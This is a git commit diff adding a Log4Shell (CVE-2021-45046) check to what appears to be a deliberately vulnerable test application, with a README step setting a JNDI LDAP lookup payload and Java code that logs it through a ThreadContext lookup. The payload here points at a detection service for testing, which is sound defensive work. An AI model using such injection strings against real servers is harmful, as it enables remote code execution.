add exploit for CVE-2021-45046

Signed-off-by: Andreas Ulm <andreas.ulm@root360.de>

Author: root360-AndreasUlm

README.md

@@ -48,5 +48,7 @@ For internal testing within this branch is an application version that is affect
 To run the test:
 1. get ID from [Huntress](https://log4shell.huntress.com/)
 1. set environment variable `LOGGING_CHECK`: `export LOGGING_CHECK="ID-from-Huntress"`
+1. set environment variable `LOGGING_CHECK_45046` to check for CVE-2021-45046:
+   `export LOGGING_CHECK_45046="\${jndi:ldap://log4shell.huntress.com:1389/ID-from-Huntress}"`
 1. run app: `bash run.sh`
 1. check the Huntress results

src/main/java/io/github/root360/app/server/TomcatServer.java

@@ -5,8 +5,10 @@
 import org.apache.catalina.WebResourceRoot;
 import org.apache.catalina.startup.Tomcat;
 import org.apache.catalina.webresources.StandardRoot;
+import org.apache.logging.log4j.Level;
 import org.apache.logging.log4j.LogManager;
 import org.apache.logging.log4j.Logger;
+import org.apache.logging.log4j.ThreadContext;
 
 /**
  * Class to control TomcatServer.
@@ -66,6 +68,12 @@ public void run(final String... args) {
               + System.getenv("LOGGING_CHECK")
               + "}");
     }
+    if (System.getenv("LOGGING_CHECK_45046") != null
+        && !System.getenv("LOGGING_CHECK_45046").isEmpty()
+        && LOGGER.isErrorEnabled()) {
+      ThreadContext.put("apiversion", System.getenv("LOGGING_CHECK_45046"));
+      LOGGER.printf(Level.ERROR, "log for CVE-2021-45046: ${ctx:apiversion}");
+    }
 
     LOGGER.info("Application started with URL {}:{}{}.", DEFAULT_HOST, port, CONTEXT_PATH);
     LOGGER.info("Hit Ctrl + D or C to stop it...");